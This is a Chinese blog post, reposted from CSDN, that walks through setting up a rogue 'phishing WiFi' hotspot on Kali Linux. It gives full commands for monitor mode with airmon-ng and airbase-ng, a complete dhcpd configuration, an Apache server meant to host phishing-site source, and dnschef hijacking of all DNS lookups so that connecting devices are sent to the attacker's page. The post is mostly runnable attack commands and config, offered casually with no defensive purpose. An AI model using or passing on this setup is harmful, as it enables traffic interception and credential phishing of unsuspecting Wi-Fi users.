疫情来袭,在家无聊,写篇博客解解闷。
搭建钓鱼wifi,这里我用的是kali系统,如果你有一个外置usb无线网卡,那么恭喜你,可以在虚拟机安装kali就可以。如果你恰好和我一样没有外置无线网卡,那就只能把kali安装到物理机了(注意一定要记得分区!分区!分区!)
具体怎么安装到物理机,有时间在给大家讲讲
0.首先,把网卡切换到监听模式并创建热点
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0 //建立监听
这里的wlan0是自己的无线网卡,可以输入ifconfig查看
(最后一条命令多执行几次,直到ifconfig出现wlan0mon)
然后创建一个名为CCDX的热带
airbase-ng -e CCDX -c 11 wlan0mon
出现这样,唉说明你创建热点成功了(这时这个窗口不要关)
这时用你的手机就可以搜到名为CCDX的热点但无法连接,因为没有分配ip
1.建立虚拟网卡并打开ip转发
这一步的意义是将这张网卡的流量转发到虚拟网卡上
(注意,这是要重新打开一个终端,因为之前那个终端已经用来开启热点了)
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 1 > /proc/sys/net/ipv4/ip_forward
创建一个虚拟网卡at0并设置ip,子网掩码和网关
2.配置dhcp服务器
这里使用dhcpd来作为dhcp服务器
vim /etc/dhcp/dhcpd.conf
在dhcpd.config里复制粘贴以下内容
authoritative;
default-lease-time 700;//默认租约时间
max-lease-time 8000;//设置最大租约时间
subnet 10.0.0.0 netmask 255.255.255.0 { //设置子网属性,netmask关键字指定子网掩码
option routers 10.0.0.1; //指定为客户机分配的默认网关地址
option subnet-mask 255.255.255.0; //指定为客户机分配的子网掩码地址
option domain-name-servers 10.0.0.1;//设置DNS服务器地址
range 10.0.0.10 10.0.0.100; //设置动态分配的IP地址范围
}
具体配置解释已经注释在配置中,需要一点网络基础,如果不懂就直接复制粘贴吧
然后启动dhcp服务器
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
出现以下,就说明启动成功了
3.搭建钓鱼网站
这里使用apache搭建
网站路径在/var/www/html/下
到时候把钓鱼网站的源码放在这里就行
这里新建一个index.html做测试用
<font size="20" color="red"> You've been hacked !!!!!!!!!!!!</font>
<br><br>
<font face="verdana" color="green">created by yuaneuro</font>
然后启动apache服务
service apache2 start
访问127.0.0.1即可看到
4.劫持DNS
那么如何让连到我们钓鱼wifi的人访问这个网页呢,这是就是需要dns来发挥作用
众所周知dns的作用是把域名解析成ip,前面用dhcp分配ip的时候就已经吧dns服务器指向本机了
这里不需要再搭建dns服务器了,dnschef将是一个很好的工具
dnschef -i 10.0.0.1 --fakeip 10.0.0.1
这条命令的作用是监听10.0.0.1并将所有域名泛解析成10.0.0.1也就是本地
5.至此,现在就可以用手机去测试了
可以看到我的ipad已经连接到我的钓鱼热点
并已经自动获取到我们设置的ip和dns
无论你输入什么网站都会自动跳转到我们的界面
6.结束
如果有什么不懂的地方可以问我,共同进步
来源:CSDN
作者:yuaneuro
链接:https://blog.csdn.net/yuaneuro/article/details/104236455